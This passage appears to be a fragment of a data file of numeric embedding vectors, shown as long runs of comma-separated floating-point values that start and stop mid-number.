24,-0.0048425,0.013232621,-0.026575865,0.011983129,0.016164798,0.01231615,-0.012414705,0.016796833,0.0066710943,-0.023757445,-0.008339965,0.03200593,0.017427621,0.0042064083,0.008182583,0.0026301425,-0.0046374938,0.017887685,-0.0034967354,-0.011968101,-0.015178949,-0.007029862,0.026299184,-0.03658523,-0.016999606,-0.015390773,0.0071985456,-0.004585562,0.0053250105,0.0009301898,0.008672429,-0.0101908045,-0.00470431,-0.014928969,-0.004479553,0.027439246,0.00049941265,-0.015281223,-0.008316185,0.0001568357,0.004933316,-0.000473271,0.013403883,-0.008012101,-0.015168701,0.0022320575,-0.013978015,-0.008308995,0.007891402,-0.0014934277,-0.030946044,-0.012524221,-0.013693527,0.0038767792,-0.0026212572,-0.0024443103,-0.0019164626,0.026383666,0.004573585,0.0076735644,-0.019751055,0.006213946,0.007030877,-0.009964037,-0.026653865,-0.0034036725,-0.030321961,0.0030011921,0.020556364,0.019269781,-0.00955718,-0.010502808,-0.0055580125,-0.025823738,-0.01750267,0.043104153,-0.0053605014,-0.00038050604,0.0048887227,0.018490646,0.019989833,-0.0031396842,0.010946496,0.019798521,0.02155766,0.0062859743,0.006986615,-0.0067270854,0.020481009,0.024664138,-0.00404825,-0.015686193,-0.016065076,-0.0019859385,0.0041152784,0.018715851,0.011126533,0.0018222154,0.0039746044,-0.010198353,0.0015593687,-0.03277906,0.008855991,0.015545171,-0.0050014895,0.0010844594,0.037397996,0.0022514744,-0.018485513,0.0000053961953,0.0011559484,-0.012314424,0.035083186,-0.027991043,0.00035488658,0.003336612,-0.045167625,0.027402438,0.012464155,0.023785092,0.023749057,-0.013907142,0.008964395,-0.0015904498,0.0076017063,0.011054662,0.005533445,0.013832428,-0.009195785,-0.005956912,-0.006837907,0.020020641,-0.015262122,-0.0017230515,0.0023917826,-0.016473286,-0.017464412,0.014188615,-0.014755965,-0.008479522,-0.007416385,-0.011969517,-0.0006239863,0.009312355,-0.01638395,-0.0058668754,-0.029861217,-0.015848061,0.0052658045,0.03413572,-0.0003411421,-0.003294532,-0.010196764,0.00901868,0.032455932,-0.00092267565,0.031635262,0.0049764244,0.01558948,-0.006700241,0.010377326,-0.010917598,0.01781859,-0.020871265,0.021008756,0.0094390325,0.00028087466,-0.015400014,0.015131517,-0.00024951223,0.010055515,-0.0015229791,0.023314007,0.00996273,-0.00023085,0.03873588,-0.028512662,-0.014732075,0.000034323577,0.0033735237,-0.018113786,0.006709839,-0.04551679,0.00936596,0.00448985,-0.019823158,0.0064341933,0.0073009892,0.022202756,-0.0009449892,-0.009908618,-0.010184928,0.009008813,-0.008101656,-0.007324948,-0.021816624,-0.0011075754,-0.0070455186,-0.0033410997,-0.018911056,-0.031116525,0.0271722,0.002430204,-0.007584001,-0.02063948,0.02283135,0.00510704,-0.030883128,0.0074576554,0.005981498,0.01332801,0.001318862,-0.003464993,0.0074303285,-0.0070203682,0.03096061,-0.03111296,0.00009223587,-0.0015048643,0.044536225,0.009519178,-0.012950032,-0.0036203926,-0.019378668,-0.022979526,-0.016694507,-0.0417851,-0.004269178,-0.012742061,-0.029070815,-0.017579429,-0.003649475,-0.0026930475,-0.017863028,0.0025672473,0.013371293,-0.00058207574,0.026540913,-0.00007543865,-0.010114473,-0.024635801,0.0031882965,0.009176505,-0.006945724,0.010955731,0.007687297,-0.00011699617,-0.028820423,-0.008323985,-0.014566778,0.0038730463,-0.008939377,0.012010127,0.010727452,0.0017115884,0.044423934,0.017287392,-0.0023326273,0.011053339,0.004688383,-0.007069596,0.0038611963,0.023102503,-0.016407667,0.003593768,-0.01576573,0.014519163,0.0407539,0.013536415,-0.014444433,0.013261909,0.0069894167,0.0017642654,-0.0022366247,0.0077589285,0.014600196,-0.00036362358,-0.019364642,-0.018319236,0.022897715,0.01449467,-0.018480627,-0.03948447,0.026755944,-0.0016211838,-0.019696657,0.0011349521,-0.0055829585,0.012217555,0.00269217,-0.01589922,0.03923047,0.021483924,-0.032560825,0.028190851,0.01575711,-0.011221149,0.005507984,-0.013206244,-0.0045195674,0.032126814,-0.017717164,0.018556979,0.00013641152,0.0012172117,0.043569945,-0.0012410417,0.00744675,-0.0054294122,0.0010765642,-0.008360489,-0.019171443,-0.030170552,0.0041682394,-0.02403265,0.0016654475,-0.019616505,-0.019068595,0.0039657885,-0.021894224,0.0063319425,-0.21322955,0.00739017,-0.01592235,-0.019752346,-0.005828009,-0.007311164,0.0067870314,0.005272121,0.013071084,0.0056922217,-0.00034831377,0.03536668,0.00014593443,0.023140775,0.006392946,0.003747836,-0.023217421,-0.006034874,-0.021748375,0.015250293,0.038013037,-0.0018122162,-0.026156701,0.010911179,0.0066554216,0.007962403,0.003820181,0.004212932,0.009988692,-0.0028707103,-0.012880276,0.02429222,-0.00068094017,0.015418746,0.004542549,0.010342977,-0.010544626,0.024637677,-0.010805932,0.023527632,-0.01857069,-0.00036278393,0.0007032771,0.0023267248,0.0015185381,0.011567501,0.0151109295,0.02372847,0.025825903,0.027085848,-0.012024997,0.016656745,0.0001884292,-0.01046309,-0.014303727,-0.012082255,0.0032365788,0.012881492,0.017074408,0.0030945977,-0.018156087,-0.009802682,0.012731589,-0.0021209286,0.018323837,0.010484596,-0.015036966,-0.01131635,-0.018594038,-0.005914565,-0.0048562284,0.030199802,-0.00044895418,0.0068476154,-0.0033958945,0.014644707,0.012633603,-0.011327692,-0.032974485,0.017557131,-0.03020457,-0.011231344,0.0048993425,0.029278817,-0.008038388,-0.00787875,0.014782155,0.004320208,0.0014947912,0.014408265,-0.015124415,0.013844082,-0.00677217,-0.015580794,-0.010296836,-0.000035661607,-0.013048279,0.013781425,-0.0038930266,0.011122102,0.011225871,-0.0068545644,0.0026111307,-0.01808112,-0.11419283,-0.0056854747,0.006618212,-0.0049651153,0.0002445416,-0.021938473,0.011263835,-0.0005197811,0.03153661,-0.00015294558,-0.006850892,-0.022605298,-0.010991756,0.0040701134,0.008078476,-0.002137091,-0.038664687,0.024492174,-0.011144482,-0.017691156,0.005280087,-0.0057421504,0.011880418,0.009453945,-0.00825938,0.016399067,0.0019967682,0.043218568,0.017119706,0.0006585729,-0.005919999,0.0032868437,-0.0062250826,-0.01880852,-0.06373934,-0.0076255603,0.022532709,0.003444038,-0.005224068,0.013861378,0.0078433845,0.00024526264,0.012279467,0.014677265,-0.0074570123,-0.022305932,0.0072064656,0.037847247,-0.00829026,-0.025489818,-0.0014337539,0.013477633,0.000403744,-0.003588609,-0.0033564,-0.02035474,0.025949623,-0.0010923289,0.0078518875,-0.0108240275,-0.0059660217,0.0119979605,-0.004929027,0.0012254189,0.02579132,0.019751208,-0.016230077,0.009551056,-0.011224632,0.01808395,0.011014445,0.024696449,-0.0017874623,-0.005682599,0.03134701,0.0023924282,0.0064561255,0.015017099,0.011720426,-0.0076748496,0.011213452,-0.00421286,0.0028668952,0.0140862595,-0.02411255,0.0101602385,-0.001666403,-0.011171026,-0.016964046,0.0023976988,0.021078367,0.0015860876,0.007150054,0.03272702,0.013975974,0.013886921,0.03368265,0.013854142,-0.017049452,-0.018468589,-0.0058698696,-0.013511594,-0.008312686,0.012523395,-0.009953287,0.011129829,0.009091594,0.0028088724,-0.00009113539,-0.0026398154,-0.003734853,0.034031704,-0.019410413,0.0064773834,0.011158044,0.006147225,-0.024879444,0.0011292471,-0.008943983,-0.008871539,0.0106161665,0.00322554,0.0009943927,-0.008945218,-0.000020986388,-0.021211054,-0.0025411074,0.03216719,0.025884176,-0.022985976,0.009922444,0.009694358,0.025044437,-0.023546902,-0.012985607,0.0116044115,-0.018496886,0.008253969,-0.00028646275,-0.00022247627,0.013216003,-0.016748352,0.0023730106,0.008497271,-0.02899617,-0.0045511476,-0.020366944,-0.022036197,-0.026474258,0.0025848586,0.016162993,-0.0015874084,0.020047083,0.037075933,0.0209259,0.009305429,-0.022512725,-0.009729593,-0.0049436516,0.01085442,-0.01804225,0.021758072,0.023588678,-0.01256258,-0.024330016,0.014296373,-0.013243346,-0.0026200672,-0.007536953,0.002056636,0.0071589104,-0.0027757788,0.0024028094,-0.039490208,0.009521583,0.008706481,0.008190333,0.022331093,0.040640254,0.02699959,-0.007523026,0.0013198615,-0.011544497,0.0056450227,0.0048770662,0.014092667,-0.023019431,-0.018407594,-0.0053204154,-0.00911325,0.039699454,0.002157656,0.0004481331,-0.0065839286,0.0065519474,0.005685305,0.006046511,0.0167614,-0.0005829057,-0.0118387975,-0.021670364,0.0038822056,0.014047308,0.013813601,0.006714641,-0.0019490027,0.0076325587,0.031815562,0.018517481,-0.010739957,-0.01879013,0.019543491,-0.01415302,0.0007384014,0.018093215,0.013484938,-0.013137425,-0.024120256,0.013108879,0.021422613,-0.012687003,-0.030086407,0.007467199,-0.010402742,-0.012404509,0.032869063,0.027247429,-0.002485598,-0.01673622,-0.013705436,0.015724823,-0.001296584,-0.042135034,-0.010895758,0.017752644,0.0048036026,0.020633586,-0.016110664,0.008391535,0.005401083,0.032297064,0.024955468,0.023173032,0.012662599,0.0020377846,-0.00647172,-0.0021308442,0.018992016,-0.0014019465,0.029037803,0.0028772878,0.014548557,-0.0028898823,0.00684126,-0.021348134,0.005558301,0.021833759,-0.0034877972,0.0077653658,0.0025525666,-0.02147666,0.012881815,-0.015817182,-0.01798563,-0.0007193979,0.002738088,-0.015485694,-0.018094545,0.00010688037,-0.003923449,0.0006744646,0.011608724,-0.021225952,0.011451563,-0.01439212,-0.009006862,0.0061448296,0.0071807764,0.016850328,0.012677315,0.0015081954,-0.0018124697,0.0009364593,0.027586352,0.011858509,0.018675815,-0.018036252,0.01251807,-0.020645948,-0.0033331113,0.007414779,-0.019387575,-0.005232261,0.012375316,0.012724951,0.014147884,0.012003882,0.0017810481,0.008560699,0.00091506384,0.012351559,0.008497098,0.004509835,-0.0068353508,0.003982559,0.0010573503,-0.0139255375,0.01989465,0.023163902,-0.012872786,-0.0052518477,0.0242136,-0.025792437,-0.004703029,0.012940958,0.006293436,-0.0009778852,-0.011002413,-0.03189738,-0.0078854,-0.025895901,0.0032666386,0.026806872,-0.02711081,0.028901778,-0.00450038,-0.011197625,0.04188361,-0.020699894,-0.02231821,0.008212691,-0.046176378,-0.011726094,-0.008799345,0.017208109,-0.0010446449,0.016255684,0.029940294,-0.025581785,0.024258478,0.009367034,-0.0015028133,-0.006645326,-0.005208175,-0.0020939703,0.000112477814,0.008389868,-0.0074029816,-0.001492998,0.018373962,0.0032302607,0.001462899,0.0037489296,-0.0124029815,-0.037648704,0.0266871,-0.02610689,0.0052458146,0.0015599601,-0.01649321,-0.006538956,-0.0030933083,-0.008761508,-0.029902346,-0.0031472659,-0.03254367,0.0031641547,0.012033295,-0.007174898,-0.0002926417,-0.0031965119,0.011906095,-0.031712115,-0.0124143185,-0.0071748034,-0.09905211,-0.0020123995,0.011980009,0.0008400551,0.015012463,-0.014170625,0.0055644256,-0.014887082,0.0027458947,0.030931829,0.002879235,-0.012921059,-0.008388904,-0.010782901,0.034996077,-0.016447961,-0.018619498,0.015527358,0.011302457,-0.0140367495,0.0076516103,0.001080514,-0.006676437,0.001908738,0.023161707,0.0060736537,-0.0015014916,-0.0072419653,0.0125283515,-0.017178608,-0.005911317,-0.0040335027,0.0025205684,-0.0007042743,-0.004119039,-0.005329639,-0.025931152,0.031055814,-0.008156808,-0.01904718,-0.00948656,0.008956321,0.010166926,-0.005732313,-0.00716961,-0.009992632,-0.027253455,0.01640425,-0.0077084536,0.008521274,0.005899799,0.013958933,0.012578797,-0.011789729,0.012055177,0.01159123,0.010615535,-0.013464666,0.028716858,0.008935865,-0.013221401,-0.014391837,0.0014541411,0.010028952,-0.0029637166,-0.007918426,0.009564604,0.011383197,-0.0087055955,-0.009817976,-0.002750545,-0.0013479067,-0.022672849,-0.016491028,-0.008616703,0.016870152,0.0077920724,0.0007700318,-0.01641633,0.0029463249,0.026304616,0.0013854114,0.006885643,0.008100174,-0.0038324208,-0.012925519,-0.015224506,-0.0052063894,0.03131761,0.01253865,-0.0056967763,-0.0048313844,-0.0053023165,0.0011141559,0.017274493,0.015283941,-0.027129723,-0.006153188,0.003056653,0.011926637,-0.0017588742,0.0016922695,-0.015167715,-0.01575702,-0.008794047,0.004347857,-0.001374596,0.011907609,-0.0010169778,-0.019524159,-0.0064536366,0.020976553,0.022234943,0.028605744,0.0020365368,0.0064617954,-0.000093558105,0.019306883,-0.01369373,-0.020175688,-0.004974135,-0.021753773,-0.012895079,0.024261212,0.017579943,0.0014745862,-0.0017327998,-0.002853456,-0.014251667,-0.0061314097,-0.02124305,0.03129847,0.018554114,0.018270496,-0.0023860447,0.0061496394,-0.00062858884,0.02269633,-0.013302025,0.026923418,-0.0041897097,0.003862441,0.014866162,-0.00021675728,-0.010818418,0.01805454,-0.007663635,-0.013043488,0.00916523,-0.016402503,0.002082677,0.0010952128,0.011615326,-0.0117946705,0.017190961,-0.0040427656,0.0031284378,0.0008876161,-0.03619706,0.00010101543,0.002924564,-0.011975954,0.025843836,-0.014629245,-0.023282457,0.022495762,0.007981212,-0.0051429016,-0.008971812,0.0004093208,-0.0153983785,0.006383222,0.007589846,-0.0045647654,-0.0061288015,-0.011444303,0.021994267,0.022917658,-0.008140682,-0.010893584,-0.0020419338,-0.0017552985,-0.01708256,0.015354999,0.003590163,-0.0030730946,0.01654894,-0.00081633864,-0.0021978451,0.0021827365,0.0056105116,0.0025045548,0.0024871964,-0.016299453,-0.0212956,0.024854757,0.0023209793,-0.01480172,-0.010541573,0.01681092,-0.010676577,0.019904895,-0.012115201,0.0032196995,0.03962567,0.0069827707,0.012421128,0.010409318,-0.017974215,0.002389404,-0.0105262585,-0.0070004943,0.01802661,0.1264066,-0.014659061,-0.009494319,-0.00035444653,0.0109095685,-0.0011982928,0.009487054,0.004078539,0.016295629,0.0105792275,0.012031204,-0.01505191,0.018734368,-0.01788509,-0.0062010167,0.021680716,0.0022567888,-0.0026905157,0.029614678,-0.0043664207,0.01828798,-0.0068777655,-0.0029492488,-0.042860005,-0.010115697,-0.033557713,0.024536215,0.023324765,0.0007878628,0.0323027,-0.0009831509,0.0063684923,0.020258594,0.013780075,-0.021764472,-0.000883843,0.016467674,-0.012633596,0.0012642153,-0.02288425,0.018674253,0.0043092696,0.0003491607,-0.0069369916,-0.009327268,-0.000035744328,0.008882945,0.007676536,-0.012833356,-0.02181615,-0.001165441,-0.0018806875,0.000088534696,-0.0064597023,0.008953936,-0.03465793,0.010586593,0.017113071,0.0134728495,-0.02458637,-0.006468917,0.015788104,0.0022047532,-0.013955155,0.020741928,0.009368635,-0.021153145,-0.011132713,0.0021969758,0.0036682803,0.016383179,-0.01380499,0.005837942,0.0007893545,-0.02085529,-0.008728422,-0.0008632662,-0.0042766826,0.008694824,-0.0031850876,0.0040513454,-0.0019546542,-0.001488605,0.014753167,0.0021390484,0.026032807,-0.012353528,-0.0030525774,-0.010034915,-0.0023077042,-0.018867683,0.007798233,0.029408298,0.010283711,-0.018010965,0.012626979,0.008094961,0.016274823,-0.010268129,-0.011814099,-0.014025367,-0.015543761,0.005798648,0.006396813,-0.00070292753,0.007844814,-0.013921678,-0.01229336,-0.012464039,0.000072787625,0.013496554,0.020614024,-0.018268168,0.00042976765,-0.0048038885,0.03516102,-0.044178583,-0.019213345,-0.00017340596,-0.020768873,0.008875041,0.014245563,0.0063707735,0.0367015,0.019534905,-0.008545456,-0.023834744,0.005612232,0.01867237,0.0024132633,0.0067852344,-0.042242065,0.001083733,0.021224404,-0.013284724,0.0058040316,0.02909046,0.017608719,0.0132569065,0.01514842,-0.0032259435,0.0013580006,-0.008311897,-0.02919958,0.008956967,-0.02302998,0.025432115,-0.024988495,0.004160675,0.005801979,0.0026395551,0.0052274135,-0.008371916,-0.013122031,-0.015601471,-0.013201597,-0.0020017447,0.0042271,0.007505753,-0.034407116,0.02301508,-0.003784321,0.011189325,-0.03365591,0.021982195,0.031362686,0.0076512266,0.003543111,0.014681072,-0.014847053,-0.0068787797,0.0006708763,-0.0059359837,0.02082731,-0.018576365,0.007777692,0.009146048,0.021034101,-0.023468416,0.005109098,0.0056446595,0.018971171,-0.0140569005,-0.016606877,0.03074443,-0.0035803916,0.010698323,0.0017723591,-0.008007981,0.03502842,0.009550996,-0.0034114183,0.0034945451,0.018131806,-0.005327557,0.014255803,-0.032697544,0.03661105,-0.026189357,-0.029754402,0.0012735261,0.010371128,0.012961251,-0.040148586,-0.003291523,-0.0062382785,0.0065296204,-0.007401353,0.009574256,-0.0027404062,0.013220857,-0.014325624,0.0013470541,-0.024496261,0.010492651,-0.005849821,0.0038367116,-0.016679635,-0.01684896,0.003422946,0.0027121413,0.011173145,-0.0025141346,0.0017272016,-0.00451447,0.0000052002215,0.003775253,0.020972485,0.015427669,-0.017533395,-0.015761202,0.030169277,0.010761028,-0.020342024,-0.02006301,0.011143998,0.032836188,0.01991244,-0.0016680561,-0.01714529,-0.004591254,-0.0011587992,0.007769311,0.0010582962,-0.03165308,0.00752936,-0.008954391,-0.002263867,0.0053539323,-0.0069933888,-0.029961089,-0.017974341,-0.016967727,-0.012629044,-0.020959454,-0.020195121,0.007826965,0.007456045,0.00053123443,-0.0040094154,0.014689065,0.0018725654,-0.001147561,0.025167622,-0.0020517376,-0.023643108,0.008137169,-0.025523975,0.008419011,0.015003821,-0.00035751425,0.0043110005,-0.016942222,0.011772209,0.02279436,-0.004351845,-0.00025626432,-0.01110498,-0.005325467,-0.008550526,0.008948808,-0.012213646,-0.023143878,-0.027351357,-0.010974863,0.025737591,-0.007243984,0.023297066,0.062494367,-0.061388988,-0.00014170741,0.007380479,0.017730292,-0.03579414,0.010523416,0.000049681697,-0.008989473,-0.019516345,0.019126926,0.0012601529,-0.005493325,-0.05387873,0.0045299293,0.0005713252,-0.0008510113,-0.0015395532,0.0054647415,0.0050073504,-0.016209697,0.015392655,-0.008829728,-0.0012476878,0.014838583,-0.018827291,-0.018994221,-0.012413628,0.0071125007,0.0034495597,0.025642928,0.013761342,0.010456107,-0.013158931,-0.0033332303,-0.0038737585,-0.005318085,-0.0074074627,-0.014530181,-0.029853852,-0.042450193,-0.01900254,0.0044092634,0.0143828215,0.0041045034,0.0049332357,-0.01058526,0.015405549,-0.014643845,0.12428734,-0.01196291,-0.0030536733,0.011901962,-0.012694299,-0.008142895,0.0069772676,0.018937143,-0.0031049724,0.027102202,0.0013476256,0.014516553,0.007541385,0.037816547,0.004963221,-0.0018947518,0.014683416,0.11072495,-0.02464104,0.030740734,0.001768122,-0.009958812,-0.008626491,-0.0013144739,0.013881384,-0.091232955,-0.0036871545,-0.035950538,-0.0015651318,-0.010653201,-0.026653305,0.019149685,-0.010567976,-0.0073377206,-0.01748488,0.011574096,0.0031345459,0.0031079082,-0.01921815,-0.023673182,-0.0077925064,0.0020017955,-0.0021081395,-0.01496504,-0.03964539,0.020607753,-0.0370828,0.0036978037,-0.0021854287,0.019779405,0.0007882262,-0.0119817,0.027380588,-0.014698124,-0.0040460243,-0.004544805,0.001140589,0.008573099,-0.011724239,0.015904164,0.0019759792,0.016664183,-0.019239385,0.019359995,-0.023248699,0.005353781,-0.012332565,-0.017489469,0.013349488,0.0013594116,0.017878426,0.035566505,-0.029743558,-0.0056310715,0.021716144,0.00065655325,-0.0063278214,0.0055655898,0.023881339,-0.009214998,0.025885314,-0.0067004054,0.0039465744,0.0061894837,0.0013753019,0.019552203,-0.014759793,-0.00017048507,0.018591015,-0.03255613,0.008838094,0.008586595,0.0006807034,0.0028078174,0.015799666,0.014478624,0.0070203273,-0.005525472,0.009665279,-0.030231068,-0.017411161,0.026740154,0.0021105204,-0.010155797,-0.019100294,0.003967854,-0.020058855,-0.022958873,0.008172843,0.0014627574,-0.007980612,0.0040240358,-0.0072961035,0.010095681,0.00977081,-0.011421365,-0.007859379,0.0095072705,-0.034927435,-0.006225112,0.0106892735,-0.012421301,-0.000054419415,-0.008185537,-0.012773491,-0.01412158,0.022425355,0.030714171,-0.010640029,-0.005754999,-0.0046796724,-0.0062029674,0.009254424,0.040486827,0.0032267214,-0.03402097,0.01651004,-0.036259722,-0.02784355,-0.020365432,0.0065188236,0.00093589514,0.015670693,0.01736482,-0.008004027,-0.007228441,-0.00006913187,-0.011157171],[-0.004201691,0.026139058,-0.024647469,0.0026602256,-0.00016489494,-0.0101643205,-0.01537197,0.020079054,-0.024849795,-0.0075252843,0.015539719,0.029163927,-0.010677173,0.0011091701,-0.010255919,-0.0068097403,0.006350417,0.0022071411,-0.00018599148,-0.0047837608,0.004979814,-0.0067989007,0.0158325,-0.006806526,0.015491518,0.008089982,0.0061322073,-0.018964829,0.0051686857,0.020340893,-0.016621917,0.016732378,0.009535112,-0.0057936264,-0.00073315797,-0.0075480854,-0.011770141,-0.01637016,0.0060655586,-0.0008901706,0.0012148039,0.0032726591,0.016310558,0.015464014,-0.0178212,-0.011690838,-0.009084543,0.0072349487,-0.010699643,-0.00087727665,0.018525848,-0.01421095,-0.003068325,0.01652453,-0.010466329,0.017946523,0.0017942014,-0.010527419,-0.0019060248,-0.0011095199,-0.012554881,0.01899096,-0.0043146326,-0.0173976,0.014283517,-0.030726638,-0.0074938927,-0.0073824734,-0.0009154909,-0.018717315,-0.0014389214,0.0020030765,0.0021918735,0.0014104239,0.018187175,0.003333056,0.013910205,-0.0233245,-0.027144173,0.001913483,-0.009128588,-0.0139091285,-0.010613682,-0.012407403,-0.00023633734,-0.0009442197,-0.0087253945,-0.0034545558,-0.008560955,-0.039405365,-0.010988909,-0.006036251,0.013259756,0.0036511552,-0.012603261,0.015440895,0.015736973,-0.010473754,-0.000020954512,0.018485013,-0.019534951,-0.013979284,-0.026096528,0.007395906,0.009563159,-0.013115576,-0.0025381509,-0.018941754,-0.0024250483,-0.01630548,0.0028825835,0.013619125,-0.0074846093,0.015533818,0.0017014398,0.0054926975,-0.009910119,0.0040293173,-0.010156626,-0.011334665,0.012125257,0.021199085,0.024043297,0.003437135,-0.011570709,-0.009932228,-0.0044552176,0.007513096,0.012803558,-0.006655722,-0.0031408225,0.011635657,-0.017615058,-0.011253851,-0.009165134,-0.007757044,-0.0016776618,-0.018026812,0.007287899,-0.02324633,0.012201091,-0.009521086,-0.0046395874,0.0009852165,0.00792565,0.025799595,0.0088207135,0.031495605,0.011177728,-0.0076526063,0.00049081765,-0.0014230144,-0.0260734,-0.0069996617,0.00031103467,0.028333038,0.0075887623,-0.004517466,-0.03849496,0.0043405155,-0.04318424,0.017167782,0.021835092,-0.02329979,-0.0011758343,-0.049433056,-0.0024283547,0.009208409,0.0007963321,0.024665847,0.015375611,0.019668465,0.021323744,-0.00440352,0.015338742,0.030784545,-0.009766794,-0.025058419,-0.018190766,-0.0045205005,0.016216945,-0.00026070024,0.017191546,0.012272588,-0.020456217,0.01614296,0.011823015,-0.01243133,-0.017108683,-0.0070669726,0.023130257,-0.015489302,-0.013046711,0.003793331,-0.002067564,-0.019460324,-0.011096076,0.10010456,0.005641287,0.0024466298,-0.0014749009,0.0074636876,0.0015191758,-0.025550088,-0.024489488,0.0031397366,0.0016642109,-0.020755336,0.012330048,-0.010292221,0.009355448,-0.01978705,-0.01295866,-0.0063815517,0.0043352894,-0.042532884,0.018110473,0.010237086,0.019311285,0.015765335,-0.011160499,0.010085038,-0.004031583,-0.023308014,-0.0026654892,-0.011229389,0.004219187,-0.004788207,0.014885951,-0.029000588,0.002842428,-0.0041962923,-0.019264042,-0.008196666,0.002102686,-0.018363912,-0.004492509,0.0003026242,-0.0037367074,-0.0075706295,0.0065563037,0.0062203133,0.036488503,0.04459041,-0.0005795532,0.009914746,0.021721736,0.008259669,-0.013117558,0.0007696444,0.022661803,-0.0116671035,0.02329687,0.019726446,-0.006555369,-0.013735806,-0.01003488,-0.025790358,0.0073770015,0.0120414095,0.016902834,0.013897913,-0.0067730453,0.03650015,0.034963876,-0.00012692128,0.019379977,-0.021871744,-0.027475886,-0.0059291,-0.008435365,-0.009551678,-0.018611778,-0.020629367,0.01173183,-0.014965625,0.003598496,-0.0045046825,0.0036256467,-0.0033576896,-0.001928243,0.009030128,-0.00076116907,-0.0032977723,-0.018883374,-0.0008125877,-0.009389942,0.019196656,0.037462354,-0.011574282,0.009054863,0.0015657624,0.010686023,-0.01683403,-0.011362531,-0.006878804,-0.0049700225,0.019425308,0.00835171,-0.026678843,0.014740015,-0.013440467,0.019735474,-0.008770389,0.0021683893,-0.023178827,-0.005268587,0.037024356,-0.022414343,0.016162895,-0.011869658,-0.0054492424,-0.022103665,-0.0061235568,-0.0050014225,0.0008434408,-0.00616661,-0.0100929085,-0.006030894,0.015663097,0.023475938,-0.01068182,-0.0039358856,-0.034654647,-0.006942248,0.00593338,0.004703838,-0.021228483,0.019175835,0.0056013246,-0.014194218,0.00444001,0.026065907,0.013752541,-0.015324025,0.024270846,-0.013063952,0.01243084,-0.004987841,0.019558221,-0.02533276,-0.008867181,-0.0034653966,0.010807141,-0.002641093,-0.008805414,-0.009082019,0.005725016,0.018711431,0.013996316,-0.006911972,0.015017317,0.008394851,-0.002146062,-0.0141755985,0.0013865901,-0.015382042,-0.017196871,-0.0015587781,-0.0030392485,0.0008684216,0.016044442,-0.019523794,0.009229823,0.08467195,-0.005360486,-0.003154205,-0.005292361,-0.025928674,-0.0004818519,0.024770133,0.0007714451,0.0084196115,-0.008745991,-0.011127173,-0.021723906,0.008550058,0.013575373,-0.015076079,0.012963939,-0.011199279,-0.017752942,-0.018369405,-0.017885013,0.02958039,-0.015756514,0.005347369,0.014224351,0.011117596,0.02648144,0.0047076936,-0.01395282,0.005722238,-0.020326568,-0.011187333,-0.009793146,0.0013712969,0.005557717,-0.051717713,0.024400646,-0.0015709792,-0.0028787975,-0.0042209267,-0.008345268,0.008265373,0.00415279,0.0042774454,-0.0140461335,-0.024854194,0.024928126,-0.0004583731,-0.013774574,-0.009577892,0.004719972,-0.00980797,0.028219383,-0.02543485,0.013480838,-0.0017101701,0.0051852297,0.014469136,-0.022556981,0.026258936,0.038004283,0.027396163,0.018372893,-0.015633,-0.013233487,-0.002971263,0.044139694,-0.016935755,-0.008818828,0.008383543,-0.016312,0.0033660142,0.011713762,0.00023159673,0.0125400415,-0.02545353,0.02011221,0.00058445084,0.003862322,0.0001953794,0.006514362,-0.007986252,-0.0025821347,0.013105676,-0.0016706405,-0.011621342,0.023235876,-0.006541489,0.022185845,0.00764414,-0.017146597,-0.010785391,0.02594768,0.014010012,0.011568819,0.03693901,0.031137759,0.0011371466,0.01892738,-0.019063318,0.0070111635,0.009502271,-0.0157481,-0.0141437175,0.00078040897,0.007209491,0.003999572,-0.0012867602,0.006316657,-0.002278748,0.028334212,-0.014785161,-0.00058369443,0.022989672,-0.0033583166,0.014443616,-0.023485417,0.0019848738,-0.008853631,-0.0058867233,0.0006440786,0.027885346,0.018219022,0.015300935,0.006981604,-0.008795068,0.0063628317,-0.014700085,-0.011123277,0.012852034,0.03896944,0.013110747,0.020170087,0.0033363313,-0.04275541,0.016936261,-0.019235892,-0.026203008,-0.04475961,0.028780445,0.002541765,0.029641468,0.025611088,0.047317978,-0.003056725,0.0038084586,0.015184452,0.03901227,0.0054513896,-0.023971012,-0.0005328036,-0.01131267,-0.0082487315,-0.0017298948,-0.009069252,0.012735927,-0.001194636,0.01977517,-0.0057142815,-0.006431209,0.03120668,0.021910127,-0.023822099,0.018750893,0.0022076112,-0.0050001936,0.020663643,0.016301317,0.041844733,-0.017868953,-0.019338094,-0.012431222,0.009130813,-0.0045993356,-0.009630208,0.012778008,-0.011161694,0.01564533,0.0010611275,0.0073534446,0.011821299,0.006572413,-0.027120933,-0.004413283,0.016446453,-0.016982276,-0.00879289,-0.0071952273,0.023070201,-0.0032589852,-0.007970625,-0.01933046,-0.016322156,0.016739992,0.0024113453,-0.0017524578,-0.029902857,-0.004101417,-0.022289736,0.0015755474,0.02627687,-0.0007582078,0.010396535,0.0055930368,0.010504234,-0.0032016786,-0.0025801994,0.038823824,0.007594671,0.013027599,0.008402067,-0.001050632,0.016894432,-0.0003574114,0.006856698,0.0062117716,-0.00010647213,-0.007362488,0.008361873,0.034135252,0.015575874,0.02186948,-0.025337497,-0.008137612,0.004339454,0.0022770683,0.006636266,0.022701215,-0.018817782,-0.01265625,-0.02795787,-0.015197561,0.0035971645,-0.009660215,-0.0028578404,-0.005896272,-0.0058273864,-0.011038041,-0.009705131,-0.0019310927,-0.017064543,-0.011709176,0.009440027,0.0063063176,-0.020454649,0.011513129,0.0039547663,-0.010006854,0.011625047,0.010946931,-0.0056944825,-0.009917418,0.031148503,-0.0018052633,-0.012175705,-0.025443902,-0.006662582,-0.009672204,0.015740423,-0.017151738,0.009033029,0.021193264,0.0072796284,-0.0053189704,-0.032493547,-0.03485462,-0.007962985,0.01927878,-0.03080462,0.006719971,-0.006810654,0.028618373,-0.023965249,-0.0054479484,0.011244887,0.0075260527,-0.010668685,-0.0021464834,0.00860836,-0.06975613,-0.01199081,0.0025088834,0.015405673,0.006687479,0.04637773,0.019599905,0.0006605253,-0.014538061,-0.009647384,-0.02364647,-0.012019894,0.011051278,0.016049033,0.004909898,-0.009790322,-0.029773274,-0.018277295,-0.016119024,-0.04772313,-0.028865205,0.030703751,0.0016623946,0.00070287875,0.0023486912,-0.0021488492,-0.0048175114,-0.020806203,-0.0075101424,-0.036222395,-0.004098563,0.029210828,-0.005862498,0.027947173,-0.01927887,-0.012608075,-0.007412518,-0.015668152,-0.018641585,-0.0053269514,0.0030184523,-0.012643649,-0.0038152616,0.01531844,-0.021822397,0.042283386,-0.0017002614,0.02487258,0.003662167,0.038478114,0.015341604,0.014666592,0.00081128994,0.0029626111,-0.018406387,0.006588068,0.010403315,0.015948182,0.023096792,0.0008855608,0.0074633155,0.007894866,-0.008353209,-0.019275282,0.00747328,0.03019839,0.02560879,-0.01388756,0.017793072,-0.